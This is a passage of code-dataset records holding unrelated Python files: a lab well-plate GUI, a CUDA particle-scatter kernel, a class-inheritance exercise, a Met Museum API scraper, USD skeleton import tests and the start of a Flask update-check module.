self.well_button_radius = 60\n elif self.plate_type == 0:\n self.plate_width = 1\n self.plate_height = 1\n self.well_button_size = 250\n self.well_button_radius = 125\n\n if full_step_reset or full_reset:\n self.selected_wells = set()\n\n if plate_nr == 0:\n self.used_wells_plate_1 = {}\n self.plate_nr = 0\n elif plate_nr == 1:\n self.used_wells_plate_2 = {}\n self.plate_nr = 1\n else:\n self.used_wells_plate_1 = {}\n self.used_wells_plate_2 = {}\n self.plate_nr_type[0] = 96\n self.plate_nr_type[1] = 96\n self.plate_nr = 0\n 
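# No plate specified: treat this as a full reset of both plates back to the default 96-well layout.\n                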
self.plate_chooser_CB.setCurrentIndex(0)\n self.plate_type_CB.setCurrentIndex(0)\n\n if full_reset:\n for step in range(self.amount_of_steps):\n self.StepGBoxes[step+1][1].deleteLater()\n del self.StepGBoxes[step+1]\n self.StepGBoxes = {}\n self.StepInformations = {}\n self.amount_of_steps = 1\n self.selceted_step = 1\n self.addStepBox()\n self.changeStep(1)\n self.changeShape('wellplate')\n\n self.changeButtonColor()\n \n self.width_gradient.blockSignals(True)\n self.height_gradient.blockSignals(True)\n self.selectWellsRB.setChecked(True)\n self.color_chooser.setCurrentIndex(0)\n self.waveTypeCB.setCurrentIndex(0)\n self.width_gradient.setMaximum(self.plate_width)\n self.height_gradient.setMaximum(self.plate_height)\n self.width_gradient.setValue(self.plate_width)\n self.height_gradient.setValue(self.plate_height)\n self.color_chooser_gradient.setCurrentIndex(0)\n self.direction_chooser_gradient.setCurrentIndex(0)\n self.max_gradient.setValue(255)\n self.min_gradient.setValue(0)\n self.width_gradient.blockSignals(False)\n self.height_gradient.blockSignals(False)\n\n def getStepInfo(self):\n stepInfo = {'Plate 1 Wells': self.used_wells_plate_1, 'Plate 1 Type': self.plate_nr_type[0],\\\n 'Plate 2 Wells': self.used_wells_plate_2, 'Plate 2 Type': self.plate_nr_type[1]}\n\n return stepInfo\n\n def loadStepInfo(self, stepInfo):\n self.reset(plate_type = self.plate_type, plate_nr = self.plate_nr)\n\n if self.plate_nr == 0:\n self.plate_chooser_CB.setCurrentIndex(0)\n if self.plate_nr == 1:\n self.plate_chooser_CB.setCurrentIndex(1)\n \n if self.plate_nr_type[self.plate_nr] == 96:\n self.plate_type_CB.setCurrentIndex(0)\n if self.plate_nr_type[self.plate_nr] == 24:\n self.plate_type_CB.setCurrentIndex(1)\n if self.plate_nr_type[self.plate_nr] == 6:\n self.plate_type_CB.setCurrentIndex(2)\n\n self.used_wells_plate_1 = stepInfo['Plate 1 Wells']\n self.used_wells_plate_2 = stepInfo['Plate 2 Wells']\n \n self.changeButtonColor()\n\n def getPlateInfo(self):\n\n return self.StepInformations\n\n def loadPlateInfo(self, plateInfo):\n if not isinstance(plateInfo, dict):\n plateInfo = ast.literal_eval(plateInfo)\n\n oldtype = self.StepInformations[1][1]['Plate 1 Type']\n #self.reset(full_reset = True, plate_nr = 0)\n\n while self.amount_of_steps < len(plateInfo):\n self.addStep()\n\n self.StepInformations = plateInfo\n\n for step in self.StepInformations:\n self.updateDuration_SB(step)\n\n self.plate_type = self.StepInformations[1][1]['Plate 1 Type']\n\n self.plate_nr_type[0] = self.StepInformations[1][1]['Plate 1 Type']\n self.plate_nr_type[1] = self.StepInformations[1][1]['Plate 2 Type']\n\n self.loadStepInfo(self.StepInformations[self.selceted_step][1])\n\n #Copy/Paste\n def copy_wells(self):\n selectedWellsInfo = []\n for well in self.selected_wells:\n if self.plate_nr == 0:\n if well in self.used_wells_plate_1.keys():\n selectedWellsInfo.append(self.used_wells_plate_1[well])\n else:\n if well in self.used_wells_plate_2.keys():\n selectedWellsInfo.append(self.used_wells_plate_2[well])\n self.clipboard = sorted(selectedWellsInfo, key=lambda pos: (pos['position'][1], pos['position'][2]))\n self.selected_wells = set()\n self.changeButtonColor()\n\n def cut_wells(self):\n selectedWellsInfo = []\n for well in self.selected_wells:\n if self.plate_nr == 0:\n if well in self.used_wells_plate_1.keys():\n selectedWellsInfo.append(self.used_wells_plate_1[well])\n del self.used_wells_plate_1[well]\n else:\n if well in self.used_wells_plate_2.keys():\n selectedWellsInfo.append(self.used_wells_plate_2[well])\n del 
self.used_wells_plate_2[well]\n        # Store the cut wells on the clipboard so they can be pasted, mirroring copy_wells\n        self.clipboard = sorted(selectedWellsInfo, key=lambda pos: (pos['position'][1], pos['position'][2]))\n        self.selected_wells = set()\n        self.changeButtonColor()\n\n    def paste_wells(self):\n        if len(self.selected_wells) == 1:\n            well_to_paste = self.Button_to_pos[next(iter(self.selected_wells))]\n            pasted_wells = []\n            if self.plate_nr == 0:\n                for well in self.clipboard:\n                    newpos = (0, well['position'][1]-self.clipboard[0]['position'][1]+well_to_paste[0], well['position'][2]-self.clipboard[0]['position'][2]+ well_to_paste[1])\n                    try:\n                        self.used_wells_plate_1[self.Pos_to_Button[(newpos[1], newpos[2])]] = well.copy()\n                        self.used_wells_plate_1[self.Pos_to_Button[(newpos[1], newpos[2])]]['position'] = newpos\n                    except KeyError:\n                        # Target position falls outside the plate; skip this well\n                        pass\n            else:\n                for well in self.clipboard:\n                    newpos = (1, well['position'][1]-self.clipboard[0]['position'][1]+well_to_paste[0], well['position'][2]-self.clipboard[0]['position'][2]+ well_to_paste[1])\n                    try:\n                        self.used_wells_plate_2[self.Pos_to_Button[(newpos[1], newpos[2])]] = well.copy()\n                        self.used_wells_plate_2[self.Pos_to_Button[(newpos[1], newpos[2])]]['position'] = newpos\n                    except KeyError:\n                        # Target position falls outside the plate; skip this well\n                        pass\n            self.selected_wells = set()\n            self.changeButtonColor()\n","repo_name":"santkumar/diya","sub_path":"software/gui/mainWidget.py","file_name":"mainWidget.py","file_ext":"py","file_size_in_byte":76222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28935384442","text":"from math import sqrt, ceil\nfrom numpy import float64, float32, int32, ndarray\nfrom swiftsimio.optional_packages import (\n    CUDA_AVAILABLE,\n    cuda_jit,\n    CudaSupportError,\n    cuda,\n)\n\nkernel_gamma = float32(1.897367)\n\n\n@cuda_jit(\"float32(float32, float32)\", device=True)\ndef kernel(r: float32, H: float32):\n    \"\"\"\n    Single precision kernel implementation for swiftsimio.\n\n    This is the Wendland-C2 kernel as shown in Dehnen & Aly (2012) [1]_.\n\n    Parameters\n    ----------\n\n    r : float32\n        radius used in kernel computation\n\n    H : float32\n        kernel width (i.e. radius of compact support for the kernel)\n\n    Returns\n    -------\n\n    float32\n        Contribution to the density by the particle\n\n    References\n    ----------\n\n    .. [1] Dehnen W., Aly H., 2012, MNRAS, 425, 1068\n\n    Notes\n    -----\n\n    This is the cuda-compiled version of the kernel, designed for use\n    within the gpu backend. It has no double precision cousin.\n    \"\"\"\n    kernel_constant = float32(2.22817109)\n\n    inverse_H = 1.0 / H\n    ratio = r * inverse_H\n\n    kernel = 0.0\n\n    if ratio < 1.0:\n        one_minus_ratio = 1.0 - ratio\n        one_minus_ratio_2 = one_minus_ratio * one_minus_ratio\n        one_minus_ratio_4 = one_minus_ratio_2 * one_minus_ratio_2\n\n        kernel = max(one_minus_ratio_4 * (1.0 + 4.0 * ratio), 0.0)\n\n    kernel *= kernel_constant * inverse_H * inverse_H\n\n    return kernel\n\n\n@cuda_jit(\n    \"void(float64[:], float64[:], float32[:], float32[:], float64, float64, float32[:,:])\"\n)\ndef scatter_gpu(\n    x: float64,\n    y: float64,\n    m: float32,\n    h: float32,\n    box_x: float64,\n    box_y: float64,\n    img: float32,\n):\n    \"\"\"\n    Creates a weighted scatter plot\n\n    Computes contributions to the image from particles with positions\n    (`x`,`y`) with smoothing lengths `h` weighted by quantities `m`.\n    This includes periodic boundary effects.\n\n    Parameters\n    ----------\n\n    x : np.array[float64]\n        array of x-positions of the particles. Must be bounded by [0, 1].\n\n    y : np.array[float64]\n        array of y-positions of the particles. 
Must be bounded by [0, 1].\n\n m : np.array[float32]\n array of masses (or otherwise weights) of the particles\n\n h : np.array[float32]\n array of smoothing lengths of the particles\n\n box_x: float64\n box size in x, in the same rescaled length units as x and y. Used\n for periodic wrapping.\n\n box_y: float64\n box size in y, in the same rescaled length units as x and y. Used\n for periodic wrapping.\n\n img : np.array[float32]\n The output image.\n\n Notes\n -----\n\n Explicitly defining the types in this function allows\n for a performance improvement. This is the cuda version,\n and as such can only be ran on systems with a supported\n GPU. Do not call this where cuda is not available (checks\n can be performed using\n ``swiftsimio.optional_packages.CUDA_AVAILABLE``)\n \"\"\"\n # Output array for our image\n res = img.shape[0]\n maximal_array_index = int32(res) - 1\n\n # Change that integer to a float, we know that our x, y are bounded\n # by [0, 1].\n float_res = float32(res)\n pixel_width = 1.0 / float_res\n\n # We need this for combining with the x_pos and y_pos variables.\n float_res_64 = float64(res)\n\n # Pre-calculate this constant for use with the above\n inverse_cell_area = res * res\n\n # get the particle index and the x and y index of its periodic copy\n i, dx, dy = cuda.grid(3)\n if i < len(x):\n # Get the correct particle\n mass = m[i]\n hsml = h[i]\n x_pos = x[i] + (dx - 1.0) * box_x\n y_pos = y[i] + (dy - 1.0) * box_y\n\n # Calculate the cell that this particle; use the 64 bit version of the\n # resolution as this is the same type as the positions\n particle_cell_x = int32(float_res_64 * x_pos)\n particle_cell_y = int32(float_res_64 * y_pos)\n\n # SWIFT stores hsml as the FWHM.\n kernel_width = kernel_gamma * hsml\n\n # The number of cells that this kernel spans\n cells_spanned = int32(1.0 + kernel_width * float_res)\n\n if (\n particle_cell_x + cells_spanned < 0\n or particle_cell_x - cells_spanned > maximal_array_index\n or particle_cell_y + cells_spanned < 0\n or particle_cell_y - cells_spanned > maximal_array_index\n ):\n # Can happily skip this particle\n return\n\n if cells_spanned <= 1:\n # Easygame, gg\n if (\n particle_cell_x >= 0\n and particle_cell_x <= maximal_array_index\n and particle_cell_y >= 0\n and particle_cell_y <= maximal_array_index\n ):\n cuda.atomic.add(\n img, (particle_cell_x, particle_cell_y), mass * inverse_cell_area\n )\n else:\n # Now we loop over the square of cells that the kernel lives in\n for cell_x in range(\n # Ensure that the lowest x value is 0, otherwise we'll segfault\n max(0, particle_cell_x - cells_spanned),\n # Ensure that the highest x value lies within the array bounds,\n # otherwise we'll segfault (oops).\n min(particle_cell_x + cells_spanned + 1, maximal_array_index + 1),\n ):\n # The distance in x to our new favourite cell\n # remember that our x, y are all in a box of [0, 1]\n # calculate the distance to the cell center\n distance_x = (float32(cell_x) + 0.5) * pixel_width\n distance_x -= float32(x_pos)\n distance_x_2 = distance_x * distance_x\n for cell_y in range(\n max(0, particle_cell_y - cells_spanned),\n min(particle_cell_y + cells_spanned + 1, maximal_array_index + 1),\n ):\n distance_y = (float32(cell_y) + 0.5) * pixel_width\n distance_y -= float32(y_pos)\n distance_y_2 = distance_y * distance_y\n\n r = sqrt(distance_x_2 + distance_y_2)\n\n kernel_eval = kernel(r, kernel_width)\n\n cuda.atomic.add(img, (cell_x, cell_y), mass * kernel_eval)\n\n\ndef scatter(\n x: float64,\n y: float64,\n m: float32,\n h: 
float32,\n res: int,\n box_x: float64 = 0.0,\n box_y: float64 = 0.0,\n) -> ndarray:\n \"\"\"\n Parallel implementation of scatter\n\n Creates a weighted scatter plot. Computes contributions from\n particles with positions (`x`,`y`) with smoothing lengths `h`\n weighted by quantities `m`.\n This includes periodic boundary effects.\n\n Parameters\n ----------\n x : np.array[float64]\n array of x-positions of the particles. Must be bounded by [0, 1].\n\n y : np.array[float64]\n array of y-positions of the particles. Must be bounded by [0, 1].\n\n m : np.array[float32]\n array of masses (or otherwise weights) of the particles\n\n h : np.array[float32]\n array of smoothing lengths of the particles\n\n res : int\n the number of pixels along one axis, i.e. this returns a square\n of res * res.\n\n box_x: float64\n box size in x, in the same rescaled length units as x and y. Used\n for periodic wrapping.\n\n box_y: float64\n box size in y, in the same rescaled length units as x and y. Used\n for periodic wrapping.\n\n Returns\n -------\n\n np.array[float32, float32, float32]\n pixel grid of quantity\n\n See Also\n --------\n\n scatter : Creates 2D scatter plot from SWIFT data\n\n Notes\n -----\n\n Explicitly defining the types in this function allows\n a performance improvement.\n \"\"\"\n if not CUDA_AVAILABLE or cuda is None:\n raise CudaSupportError(\n \"Unable to load the CUDA extension to numba. This function \"\n \"is only available on systems with supported GPUs.\"\n )\n\n output = cuda.device_array((res, res), dtype=float32)\n output[:] = 0\n\n n_part = len(x)\n if box_x == 0.0:\n n_xshift = 1\n else:\n n_xshift = 3\n if box_y == 0.0:\n n_yshift = 1\n else:\n n_yshift = 3\n # set up a 3D grid:\n # the first dimension are the particles\n # the second and third dimension are the periodic\n # copies for each particle\n threads_per_block = (16, 1, 1)\n blocks_per_grid = (\n ceil(n_part / threads_per_block[0]),\n n_xshift // threads_per_block[1],\n n_yshift // threads_per_block[2],\n )\n scatter_gpu[blocks_per_grid, threads_per_block](x, y, m, h, box_x, box_y, output)\n\n return output.copy_to_host()\n\n\nscatter_parallel = scatter\n","repo_name":"wullm/swiftsimio","sub_path":"swiftsimio/visualisation/projection_backends/gpu.py","file_name":"gpu.py","file_ext":"py","file_size_in_byte":8728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"37387846017","text":"class Fish:\n def __init__(self,first_name,last_name=\"fish\",skeleton=\"bone\",eyelids=False):\n self.first_name=first_name\n self.last_name=last_name\n self.skeleton=skeleton\n self.eyelids=eyelids\n def swim(self):\n print(\"This Fish is swimming\")\n def swim_backwards(self):\n print(\"This fish swim backwards\")\nclass Trout(Fish):\n def __init__(self,water=\"freshwater\"):\n self.water=water\n super().__init__(self)\nterry=Trout()\nterry.first_name=\"Terry\"\nterry.swim()\nterry.swim_backwards()\nprint(\"====coming in super wala keywords=====\")\nprint(terry.water)\nprint(terry.first_name +\"----\"+ terry.last_name+\"----\"+terry.skeleton)\nclass clownfish(Fish):\n def live_catch(self):\n print(\"coming in clown fish block\")\ncasey=clownfish('casey')\nprint(casey.first_name)\ncasey.live_catch()\nclass Shark(Fish):\n def __init__(self,first_name,last_name=\"shark\",skeleton=\"cartilage\",eyelids=True):\n self.first_name=first_name\n self.last_name=last_name\n self.skeleton=skeleton\n self.eyelids=eyelids\n def swim_backwards(self):\n print(\"This cannot swim 
backwards\")\nrohu=Shark(\"shrkies\")\nprint(\"shark calls come here\")\nprint(rohu.first_name+\"===\"+rohu.last_name+\"===\"+rohu.skeleton+\"=====\"+str(rohu.eyelids))\nrohu.swim()\nrohu.swim_backwards()\n\n","repo_name":"ranvsin2/PythonBasics","sub_path":"fish.py","file_name":"fish.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7594277575","text":"from settings import *\nfrom ArtObjectModel import *\n\nimport requests\nimport json\nimport datetime\nimport os\nimport shutil\n\n\n\ndef main():\n\n    r = requests.get('https://collectionapi.metmuseum.org/public/collection/v1/objects')\n\n    total = r.json()['total']\n    olist = r.json()['objectIDs']\n\n    print('There are {} objects.'.format(total))\n\n\n    for i in olist[47001:49000]:\n        ro = requests.get('https://collectionapi.metmuseum.org/public/collection/v1/objects/'+str(i))\n        oj = ro.json()\n        # Reuse the parsed response instead of re-parsing it; .get avoids a KeyError on records that lack these fields\n        if 'China' in oj.get('culture', '') and oj.get('primaryImage') and oj.get('isPublicDomain'):\n            if not ArtObject.exists(oj['objectID']):\n                print('Found new object')\n                mdate = oj['metadataDate'].split('.')[0]\n                md = mdate[:-1] if mdate[-1].isalpha() else mdate\n                ArtObject.add(oj['objectID'],\n                              oj['isHighlight'],\n                              oj['accessionNumber'],\n                              oj['isPublicDomain'],\n                              oj['primaryImage'],\n                              oj['objectName'],\n                              oj['culture'],\n                              oj['objectDate'],\n                              datetime.datetime.fromisoformat(md))\n\nif __name__ == '__main__':\n    main()","repo_name":"ladyewilkinson/metoa","sub_path":"builddb.py","file_name":"builddb.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12894303816","text":"import string\nfrom typing import List\n\nimport pytest\n\nimport FbxCommon as fbx\n\nfrom pxr import Usd, UsdGeom, UsdSkel, Sdf, Gf\nfrom data import (\n    Joint,\n    Mesh,\n    SkinBinding,\n    TransformableNode,\n    scenebuilder,\n    Transform,\n    Property,\n    AnimationCurve,\n)\n\n\ndef validate_skeleton(cache, prim, nodes: List[Joint]):\n    def node_to_path(node):\n        if node.parent is None or type(node.parent) is not Joint or node.is_root:\n            return node.name\n        return f\"{node_to_path(node.parent)}/{node.name}\"\n\n    node_paths = [node_to_path(node) for node in nodes]\n    query = cache.GetSkelQuery(prim)\n\n    topology = query.GetTopology()\n    joint_order = query.GetJointOrder()\n    joint_local_xforms = query.ComputeJointLocalTransforms(Usd.TimeCode.Default())\n    for i in range(len(topology)):\n        name = Sdf.Path(joint_order[i]).name\n        parent = topology.GetParent(i)\n\n        try:\n            validation_object = nodes[node_paths.index(joint_order[i])]\n        except ValueError:\n            raise ValueError(\n                f\"Could not find a match in the validation data for {name}\"\n            )\n\n        parent_name = Sdf.Path(joint_order[parent]).name if parent >= 0 else None\n        validation_parent_name = (\n            validation_object.parent.name\n            if validation_object.parent is not None\n            else None\n        )\n\n        assert parent_name == validation_parent_name\n\n        transform = validation_object.transform\n        assert joint_local_xforms[i].ExtractTranslation() == transform.t\n        # This assumes xyz rotation order\n        decomposed_rot = joint_local_xforms[i].ExtractRotation().Decompose(Gf.Vec3d.XAxis(), Gf.Vec3d.YAxis(), Gf.Vec3d.ZAxis())\n        assert Gf.IsClose(decomposed_rot, transform.r, 0.0001)\n\n\n@pytest.fixture\ndef simple_skeleton_fbx(fbx_defaults):\n    output_dir, manager, scene, fbx_file_format = fbx_defaults\n    t = (0.0, 40.0, 0.0)\n    r = (90, 0, 0)\n    with 
scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n root_node = Joint(name=\"root\", is_root=True)\n child_1 = Joint(name=\"child_1\", parent=root_node, transform=Transform(t=t, r=r))\n child_2 = Joint(name=\"child_2\", parent=child_1, transform=Transform(t=t, r=r))\n builder.nodes.extend([root_node, child_1, child_2])\n yield str(builder.settings.file_path), builder.nodes\n\n\ndef test_simple_skeleton(simple_skeleton_fbx):\n file_path, nodes = simple_skeleton_fbx\n stage = Usd.Stage.Open(file_path)\n root = None\n skeleton_prim = None\n unknowns = []\n for prim in stage.Traverse():\n if prim.IsA(UsdSkel.Root):\n root = UsdSkel.Root(prim)\n elif prim.IsA(UsdSkel.Skeleton):\n skeleton_prim = UsdSkel.Skeleton(prim)\n else:\n unknowns.append(prim)\n\n assert None not in [root, skeleton_prim]\n assert not unknowns\n\n # The plugin creates a Skeleton prim with the same name as the root joint of the hierarchy it represents\n assert skeleton_prim.GetPrim().GetName() == nodes[0].name\n\n cache = UsdSkel.Cache()\n\n validate_skeleton(cache, skeleton_prim, nodes)\n\n\n@pytest.fixture\ndef multiple_skeletons_fbx(fbx_defaults):\n output_dir, manager, scene, fbx_file_format = fbx_defaults\n with scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n root_node_a = Joint(name=\"root_a\", is_root=True)\n child_1 = Joint(name=\"child_1\", parent=root_node_a)\n child_2 = Joint(name=\"child_2\", parent=child_1)\n builder.nodes.extend([root_node_a, child_1, child_2])\n root_node_b = Joint(name=\"root_b\", is_root=True)\n child_3 = Joint(name=\"child_1\", parent=root_node_b)\n child_4 = Joint(name=\"child_2\", parent=child_3)\n builder.nodes.extend([root_node_b, child_3, child_4])\n yield str(builder.settings.file_path), builder.nodes\n\n\ndef test_multiple_skeletons(multiple_skeletons_fbx):\n file_path, nodes = multiple_skeletons_fbx\n stage = Usd.Stage.Open(file_path)\n\n skeleton_prims = [\n UsdSkel.Skeleton(prim)\n for prim in stage.Traverse()\n if prim.IsA(UsdSkel.Skeleton)\n ]\n assert len(skeleton_prims) == len([obj for obj in nodes if obj.parent is None])\n\n cache = UsdSkel.Cache()\n\n for skeleton_prim in skeleton_prims:\n validate_skeleton(cache, skeleton_prim, nodes)\n\n\n@pytest.fixture\ndef nested_skeletons_fbx(fbx_defaults):\n output_dir, manager, scene, fbx_file_format = fbx_defaults\n with scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n null = TransformableNode(name=\"null\")\n root_node_a = Joint(name=\"root\", parent=null, is_root=True)\n child_1 = Joint(name=\"child_1\", parent=root_node_a)\n child_2 = Joint(name=\"child_2\", parent=child_1)\n builder.nodes.extend([null, root_node_a, child_1, child_2])\n yield str(builder.settings.file_path), builder.nodes\n\n\ndef test_nested_skeleton(nested_skeletons_fbx, root_prim_name):\n \"\"\"\n Tests for generating skeletons that are parented to other objects\n but within a SkeletonRoot.\n \"\"\"\n file_path, nodes = nested_skeletons_fbx\n stage = Usd.Stage.Open(file_path)\n\n path_to_skel = \"/\".join([obj.name for obj in nodes[:2]])\n skeleton = UsdSkel.Skeleton.Get(stage, f\"/{root_prim_name}/{path_to_skel}\")\n assert skeleton\n parent = skeleton.GetPrim().GetParent()\n assert parent and not parent.IsA(UsdSkel.Skeleton)\n\n\n@pytest.fixture\ndef mixed_type_hierarchy_fbx(fbx_defaults):\n output_dir, manager, scene, fbx_file_format = fbx_defaults\n with 
scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n a = Joint(name=\"A\", is_root=True)\n b = Joint(name=\"B\", parent=a)\n c = TransformableNode(name=\"C\", parent=b)\n d = Joint(name=\"D\", parent=c)\n builder.nodes.extend([a, b, c, d])\n yield str(builder.settings.file_path), builder.nodes\n\n\ndef test_hierarchy_with_mixed_types(mixed_type_hierarchy_fbx, capfd, root_prim_name):\n \"\"\"\n Tests for skeletons that have mixed types in their hierarchy.\n\n Example:\n A (joint) -> B (joint) -> C (null) -> D (joint)\n The outcome of this should be a skeleton with joints A and B, but D is ignored\n as it has a non-skeleton parent.\n\n Note:\n This limitation is artificial and if it is deemed necessary to take _any_ transformable\n within a skeleton hierarchy as a joint, this can be changed in the plugin.\n\n \"\"\"\n file_path, nodes = mixed_type_hierarchy_fbx\n stage = Usd.Stage.Open(file_path)\n\n out, err = capfd.readouterr()\n assert not out\n assert (\n \"warn\" in err.lower() and f'\"{nodes[2].name}\" is not an FbxSkeleton node' in err\n ), \"No warnings have been raised, but were expected\"\n\n skeleton = UsdSkel.Skeleton.Get(stage, f\"/{root_prim_name}/{nodes[0].name}\")\n cache = UsdSkel.Cache()\n query = cache.GetSkelQuery(skeleton)\n joint_order = query.GetJointOrder()\n assert len(joint_order) != len(\n nodes\n ), \"Generated skeleton equates that of source, this is unexpected in this scenario\"\n\n\n@pytest.fixture\ndef skeleton_binding_fbx(fbx_defaults):\n output_dir, manager, scene, fbx_file_format = fbx_defaults\n offset = 10.0\n t = Transform(t=(offset, 0.0, 0.0))\n with scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n a = Joint(name=\"A\", is_root=True)\n b = Joint(name=\"B\", parent=a, transform=t)\n c = Joint(name=\"C\", parent=b, transform=t)\n\n geo = Mesh(\n name=\"bound_skin\",\n points=[\n p for x in range(3) for p in ((x * offset, 0, -1), (x * offset, 0, 1))\n ],\n skinbinding=(\n SkinBinding(\n target_joint=a,\n vertex_weights=((0, 1.0), (1, 1.0), (2, 0.25), (3, 0.25)),\n ),\n SkinBinding(target_joint=b, vertex_weights=((2, 0.5), (3, 0.5))),\n SkinBinding(\n target_joint=c,\n vertex_weights=((4, 1.0), (5, 1.0), (2, 0.25), (3, 0.25)),\n ),\n ),\n polygons=[(0, 1, 3), (3, 2, 0), (2, 3, 5), (5, 4, 2)],\n )\n builder.nodes.extend([a, b, c, geo])\n yield str(builder.settings.file_path), builder.nodes\n\n\ndef test_simple_binding(skeleton_binding_fbx, root_prim_name):\n file_path, nodes = skeleton_binding_fbx\n stage = Usd.Stage.Open(file_path)\n cache = UsdSkel.Cache()\n\n # NOTE: While fetching the skinned prim as is would be sufficient, it's important to use the UsdSkelAPI here\n it = iter(stage.Traverse())\n for prim in it:\n if prim.IsA(UsdSkel.Root):\n it.PruneChildren()\n\n root = UsdSkel.Root(prim)\n cache.Populate(root, Usd.TraverseInstanceProxies())\n\n bindings = cache.ComputeSkelBindings(root, Usd.TraverseInstanceProxies())\n assert bindings\n for binding in bindings:\n assert binding.GetSkeleton()\n query = cache.GetSkelQuery(binding.GetSkeleton())\n assert query\n skinning_xforms = query.ComputeSkinningTransforms(Usd.TimeCode.Default())\n assert len(skinning_xforms) == 3\n # Iterate over the prims that are skinned by this Skeleton.\n for skinning_query in binding.GetSkinningTargets():\n skinned_prim = skinning_query.GetPrim()\n assert skinned_prim\n assert skinned_prim.GetName() == nodes[-1].name\n\n binding_api = 
UsdSkel.BindingAPI(skinned_prim)\n assert binding_api\n\n joints_attr = binding_api.GetJointsAttr()\n assert joints_attr, \"The plugin must define skel:joints\"\n\n joint_indices_attr = binding_api.GetJointIndicesAttr()\n assert (\n joint_indices_attr\n ), \"The plugin must define primvars:skel:jointIndices\"\n\n joint_weights_attr = binding_api.GetJointWeightsAttr()\n assert (\n joint_weights_attr\n ), \"The plugin must define primvars:skel:jointWeights\"\n\n indices_primvar = UsdGeom.Primvar(joint_indices_attr)\n weights_primvar = UsdGeom.Primvar(joint_weights_attr)\n assert (\n weights_primvar.GetElementSize() == indices_primvar.GetElementSize()\n ), \"Weights and indices must match in elementSize!\"\n\n\n@pytest.fixture(\n params=[\n (\n \"Visibility\",\n False,\n \"\",\n None,\n 0.0,\n 1.0,\n ),\n (\n \"some_float_property\",\n True,\n \"Number\",\n fbx.EFbxType.eFbxFloat,\n -10.0,\n 10.0,\n ),\n ],\n scope=\"session\",\n)\ndef animated_bone_properties_fbx(fbx_defaults, fbx_animation_time_codes, request):\n output_dir, manager, scene, fbx_file_format = fbx_defaults\n fbx_property_data = request.param\n fbx_times = fbx_animation_time_codes[0]\n\n with scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n builder.settings.anim_layers = (\"Base\",)\n\n curve = AnimationCurve(\n anim_layer=\"Base\", times=fbx_times, values=list(fbx_property_data[4:])\n )\n fbx_property = Property(\n name=fbx_property_data[0],\n animation_curves=[curve],\n value=fbx_property_data[4],\n user_defined=fbx_property_data[1],\n data_name_and_type=(fbx_property_data[2:4])\n if fbx_property_data[3] is not None\n else None,\n )\n\n a = Joint(name=\"A\", is_root=True)\n b = Joint(name=\"B\", parent=a, properties=[fbx_property])\n c = Joint(name=\"C\", parent=b)\n d = Joint(name=\"D\", parent=c, properties=[fbx_property])\n builder.nodes.extend([a, b, c, d])\n\n expected = (\n f\"userProperties:{fbx_property_data[0]}\", # property name\n 2, # num values per timesample\n (\"A/B\", \"A/B/C/D\"), # owners\n )\n yield str(builder.settings.file_path), builder.nodes, expected\n\n\ndef test_animated_bone_properties(animated_bone_properties_fbx, root_prim_name):\n file_path, nodes, expected = animated_bone_properties_fbx\n stage = Usd.Stage.Open(file_path)\n\n anim_prim = stage.GetPrimAtPath(f\"/{root_prim_name}/Animation{nodes[0].name}\")\n assert anim_prim\n anim_node = UsdSkel.Animation(anim_prim)\n assert anim_node\n\n prop_name, values_per_sample, owners = expected\n attr = anim_prim.GetAttribute(prop_name)\n\n assert attr\n assert attr.GetNumTimeSamples()\n assert attr.GetTimeSamples()\n assert set([len(attr.Get(Usd.TimeCode(x))) for x in attr.GetTimeSamples()]) == {\n values_per_sample\n }\n\n owner_attr = anim_prim.GetAttribute(f\"{prop_name}:owner\")\n assert owner_attr\n assert owner_attr.Get() == owners\n\n\n# NOTE: This could be moved to test_skeleton.py\n@pytest.fixture(\n params=[(f\"child{c}\", \"child_\") for c in string.punctuation + string.whitespace]\n)\ndef simple_skeleton_dirty_names_fbx(fbx_defaults, request):\n output_dir, manager, scene, fbx_file_format = fbx_defaults\n input_name, expected_name = request.param\n with scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n root_node = Joint(name=\"root\", is_root=True)\n child_1 = Joint(name=f\"{input_name}1\", parent=root_node)\n child_2 = Joint(name=f\"{input_name}2\", parent=child_1)\n builder.nodes.extend([root_node, child_1, 
child_2])\n yield str(builder.settings.file_path), builder.nodes, (\n \"root\",\n f\"root/{expected_name}1\",\n f\"root/{expected_name}1/{expected_name}2\",\n )\n\n\ndef test_skeletonCleanedNames(simple_skeleton_dirty_names_fbx, root_prim_name):\n file_path, nodes, expected_topology = simple_skeleton_dirty_names_fbx\n stage = Usd.Stage.Open(file_path)\n\n skel = UsdSkel.Skeleton(stage.GetPrimAtPath(f\"/{root_prim_name}/root\"))\n cache = UsdSkel.Cache()\n query = cache.GetSkelQuery(skel)\n\n joint_order = query.GetJointOrder()\n assert joint_order == expected_topology\n","repo_name":"Remedy-Entertainment/usdFBX","sub_path":"tests/test_skeleton.py","file_name":"test_skeleton.py","file_ext":"py","file_size_in_byte":14500,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"53"} +{"seq_id":"12894303816","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport os\nimport json\nimport platform\n\nfrom flask import Blueprint, request, jsonify, send_from_directory, abort, make_response\n\n# , Flask\nfrom conf.updatecheck_params_define import *\nfrom service.updatecheck import version_check_functions\n\nupdatecheck_blueprint = Blueprint('updatecheck', __name__)\n\nlog_path = get_logger_file(name='updatecheck.log')\nupdatecheck_logger = configure_logger('updatecheck', log_path)\n\n# 推送beta版本的qtalk\n# global_user_white_list = {'lffan.liu@ejabhost1', 'xi.ma@ejabhost1', 